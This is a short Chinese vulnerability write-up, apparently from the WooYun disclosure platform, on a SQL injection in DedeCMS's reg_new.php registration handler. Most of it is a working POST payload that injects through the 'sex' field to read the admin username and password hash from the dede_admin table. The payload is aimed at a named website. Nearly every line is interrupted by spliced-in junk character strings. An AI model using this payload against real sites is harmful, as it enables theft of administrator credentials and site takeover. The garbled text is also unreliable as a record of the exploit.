漏洞类型: SQL注射漏洞
4 ?" h2 N" z; M/ Y' Y9 G: s简要描述:6 j4 M) ?2 J$ t( c+ k
, r( @9 R5 f# A需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
H- I7 x/ B4 j原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.* U8 u8 u% q* U+ `/ G+ U
详细说明:跟这个漏洞
) @) g0 C% G8 J: J* p2 u
& O# w: ~, [3 E. z9 ~/ GWooYun: Dedecms SQL注射导致审核机制绕过漏洞
; p4 j% i; c0 q8 X% N& o* E; J是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的., l: d& l& K# t& O7 m
POST提交以下数据,其实不用POST提交的,这样隐蔽点./ \ ?& n9 Q8 X% Z4 a, |' O" Q& k
* Q. S' T/ n" [% Z: swww.political-security.com/member/reg_new.php
3 @' f P* a6 W* \ 3 ^) b, a/ {& ?* g; ?
POST
4 \; u, d8 d3 ?
2 b1 s' t4 Q! J8 l& U9 }dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&# l1 t/ o* \' `" m$ @; J6 S8 D) O
userid=c4rp3nt3r&uname=c4rp3nt3r' `( {7 u' Y: M4 S% Z( P3 Q
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
6 @; R B. \5 Y% e+ `&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,2 j! O% g8 V* O9 i L% n
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
7 L( a" S! S3 N4 X' h, F%00&vdcode=glos&agree= |